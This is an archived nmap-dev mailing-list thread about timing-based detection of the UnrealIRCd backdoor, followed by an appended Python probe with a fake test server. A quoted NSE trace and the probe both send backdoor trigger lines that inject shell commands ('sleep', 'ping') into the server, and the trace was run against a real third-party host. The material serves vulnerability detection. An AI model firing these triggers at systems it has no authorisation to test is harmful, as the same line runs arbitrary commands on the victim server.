Nmap Development mailing list archives
Re: Always practice safe software: a lesson from UnrealIRCd
From: Ron <ron () skullsecurity net>
Date: Thu, 24 Jun 2010 10:05:04 -0500
The attached version of the code, in my testing, had no false positives and no false negatives. The downside is, it's incredibly slow.

A mutex + 10 second delay and 20 second timeout had 5 good, 1 false positive.

A mutex + 25 second delay + 35 second timeout = perfect, 5 out of 5 on my test list with no false positives/negatives.

So basically, 25 seconds for every infected host, 35 seconds for every host that times out, and basically no time for hosts that aren't affected either way.

Something that would be useful here would be a semaphore -- let 3 or 4 go in parallel, but no more. I don't think we have that capability right now, though, and I'm not sure if that would ruin our results.

Thoughts?

On Wed, 23 Jun 2010 18:38:05 -0600 David Fifield <david () bamsoftware com> wrote:
> On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
> > I found a better way to detect vulnerable servers, but unfortunately it
> > isn't something an average person can do (requires a DNS authoritative
> > server).
> >
> > From the original list, with a 20 second delay and 40 second timeout,
> > on the list you provided earlier, I found:
> >  o 4 vulnerable servers
> >  o 3 were discovered
> >  o 1 false positive
> >  o 1 was missed because of 'too many reconnects'
> >
> > So, that isn't very good. We can make the delays even longer, and I
> > think it'll get rather accurate, but I don't think that's ideal, either.
> > I'm going to give mutex a shot, still.
>
> Ah, so the timing is accurate enough, but it's not really an accurate
> reflection of whether the vulnerability exists. I tried using
> irc-unrealircd-backdoor.command to ping a server, and against all the
> 9- and 11-second hosts, a vulnerability was detected but I didn't
> receive any pings. It looks like the delay is really being caused by a
> lack of an auth response.
>
> Discovered open port 6667/tcp on 91.121.137.140
> NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
> NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16
> NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667]
> NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
> NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1
> NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1.
> NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
> NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
> NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
> NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
> NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
> NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
> NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
> NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
> NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered..
> NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered
>
> David Fifield
--
Ron Bowes
http://www.skullsecurity.org
http://www.twitter.com/iagox86
Attachment: irc-unrealircd-backdoor.nse
Attachment: _bin
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
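The timing heuristic discussed in this thread, as an added example that is not the NSE script attached to the mail: a plain-Python probe that sends the trigger line carrying a `sleep N`, times the server's first numeric reply (the 451 in David's trace) and runs the probe twice with different sleep lengths. A backdoored daemon's delay grows with the requested sleep; a server that is merely waiting on ident or DNS lookups answers after the same fixed delay whichever sleep is requested, which is the false-positive case above. The `AB;` prefix with `;` separators, the sleep lengths, the tolerance, the port numbers and the fake server used for the offline demo are choices made here, not values taken from the thread; the fake server models the lookup wait as a fixed delay and the backdoor as a blocking sleep.

```python
"""Timing probe for the UnrealIRCd 3.2.8.1 backdoor with a control measurement.

Added example for this thread, not the NSE script attached to the mail.
Assumptions: the "AB;" prefix with ';' separators, the sleep lengths, the
tolerance and the demo ports are chosen here; fake_ircd is a constructed
stand-in for a real ircd, used only so the demo runs offline.
"""
import socket
import threading
import time

TRIGGER = "AB;"   # the backdoored read path hands lines starting with "AB" to system()


def is_numeric_reply(line):
    """True for ':server 451 ...'-style replies, False for NOTICE AUTH banners."""
    parts = line.strip().split()
    return len(parts) >= 2 and parts[0].startswith(":") and parts[1].isdigit()


def probe(host, port, sleep_seconds, timeout, unique="SOMETHINGUNIQUE"):
    """Send one trigger line carrying 'sleep N' on a fresh connection and return
    the seconds until the server answers it with an IRC numeric (the 451 'You
    have not registered' in the trace), or None on timeout.  NOTICE AUTH
    lookup banners are ignored: they are sent before our line is processed."""
    line = "%s%s;sleep %g\n" % (TRIGGER, unique, sleep_seconds)
    deadline = time.monotonic() + timeout
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        start = time.monotonic()
        s.sendall(line.encode())
        while True:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                return None
            s.settimeout(remaining)
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                return None
            if not chunk:          # server closed without a numeric reply
                return None
            buf += chunk
            while b"\n" in buf:
                raw, buf = buf.split(b"\n", 1)
                if is_numeric_reply(raw.decode("utf-8", "replace")):
                    return time.monotonic() - start


def judge(short_sleep, short_delay, long_sleep, long_delay, tolerance=2.0):
    """Classify a host from two probes with different sleep lengths.

    A backdoored daemon blocks in system() for the whole sleep, so its reply
    delay grows by (long_sleep - short_sleep).  A clean server that is merely
    waiting on ident/DNS lookups answers after the same fixed delay whatever
    we send: the delay can look like ours but does not scale with it.  Sleeps
    shorter than the lookup wait cannot be told apart, hence 'inconclusive'.
    """
    if short_delay is None or long_delay is None:
        return "timeout"
    growth = long_delay - short_delay
    if abs(growth - (long_sleep - short_sleep)) <= tolerance:
        return "vulnerable"
    if long_delay < long_sleep - tolerance:
        return "not vulnerable"   # answered before the requested sleep could have ended
    return "inconclusive"


def fake_ircd(port, lookup_delay, backdoored):
    """Constructed stand-in, demo only: replies after max(lookup wait, sleep)
    when backdoored, after the lookup wait alone when clean."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(5)

    def serve():
        while True:
            c, _ = srv.accept()
            t0 = time.monotonic()
            c.sendall(b":fake.irc NOTICE AUTH :*** Looking up your hostname...\r\n")
            line = c.recv(4096).decode("utf-8", "replace")
            if backdoored and line.startswith("AB"):
                time.sleep(float(line.rsplit("sleep ", 1)[1]))   # whole daemon stalls here
            time.sleep(max(0.0, lookup_delay - (time.monotonic() - t0)))
            c.sendall(b":fake.irc 451 AB :You have not registered\r\n")
            c.close()

    threading.Thread(target=serve, daemon=True).start()


if __name__ == "__main__":
    # Scaled-down delays: a 1 s "ident timeout" and sleeps of 1.5 s and 3 s,
    # both longer than the lookup wait so the growth test can discriminate.
    fake_ircd(16667, 1.0, backdoored=False)
    fake_ircd(16668, 1.0, backdoored=True)
    for port in (16667, 16668):
        d1 = probe("127.0.0.1", port, 1.5, timeout=10)
        d2 = probe("127.0.0.1", port, 3.0, timeout=10)
        print(port, d1, d2, judge(1.5, d1, 3.0, d2, tolerance=0.3))
```

Run with no arguments to see the clean fake server reported as "not vulnerable" and the backdoored one as "vulnerable". Against a real host, pick both sleeps longer than the ident/DNS timeouts you expect (otherwise the result is "inconclusive", not wrong), and keep probes against one host serialized: the sleep runs inside system() in the daemon's read path, so it stalls every other connection to that server and parallel probes distort each other's timings.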